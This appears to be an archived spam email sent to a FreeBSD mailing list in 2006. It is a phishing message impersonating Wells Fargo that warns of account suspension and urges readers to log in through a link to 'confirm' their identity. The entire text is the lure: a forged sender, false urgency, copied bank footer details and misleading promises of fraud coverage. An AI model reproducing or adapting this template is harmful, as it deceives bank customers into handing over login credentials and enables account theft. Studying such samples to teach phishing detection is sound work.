Date:      Sun, 9 Jul 2006 12:28:49 -0500
From:      Wellsfargo Bank <service@wellsfargo.com>
To:        standards@FreeBSD.ORG
Subject:   Wells fargo - Security Service Importand ( Your Account Suspend Now )

   [spacer.gif] [spacer.gif]

   [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif]
   [spacer.gif] [spacer.gif]
   [spacer.gif] [spacer.gif] [spacer.gif] [1][spacer.gif] [spacer.gif]
   [spacer.gif]
   [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif]
   [spacer.gif]
   [2]Wells Fargo Wells Fargo
   [spacer.gif]
   [spacer.gif] [spacer.gif] Wells fargo security update
   Dear Wells Fargo customer,
   We at Wells Fargo, would like to remind you that your Wells Fargo
   Account has not been updated to the latest Online Access Agreement for
   Wells Fargo Online Services.
   In order for us, at Wells Fargo to guarantee your online security, you
   need to update your account information. We urge you to partner with
   us to prevent consumer fraud, by going through the 2 steps Wells Fargo
   Account Confirmation process. This operation involves logging in and
   confirming your identity over a secure connection at:
   [3]sing on now
   After completing this process, you will be informed that your account
   has been updated and you will be redirected to the actual Online
   Access Agreement, for you to review.
   Thank you for choosing Wells Fargo as your Financial Institution.
   When you use Wells Fargo Online ® or Wells Fargo Business Online ®
   Banking, we guarantee that you will be covered 100% for any funds
   improperly removed from your Wells Fargo accounts, while we are
   handling your transactions, subject to your responsibility, described
   below.
   © 1999 - 2006 Wells Fargo Bank. All rights reserved

   Online Customer Service Code: 0605PREFS37180
   Wells Fargo Headquarters: 420 Montgomery St. San Francisco, CA 94104
   © 2006 Wells Fargo Bank, N.A. All rights reserved. Member FDIC. Equal
   Housing Lender.
   [sp_000000.gif]
   [spacer.gif] [spacer.gif]
   [crossbar.gif] [crossbar.gif]
   [crossbar2.gif]
   [spacer.gif] [spacer.gif]

   [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif]
   [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif] [spacer.gif]
   [spacer.gif]
   [spacer.gif] [spacer.gif]
   [eof?PslDVYATDUEHL_mHspFRHohhDJhtEaEvE9.26ee9v.2e.26ETZTYwy.26.40zTVE7
   .40.40bub1f9v.2e.26EVTTZTYTWYCZCC]